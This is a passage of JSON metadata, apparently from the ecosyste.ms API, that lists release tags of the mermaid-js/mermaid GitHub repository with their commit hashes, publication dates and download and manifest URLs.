24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/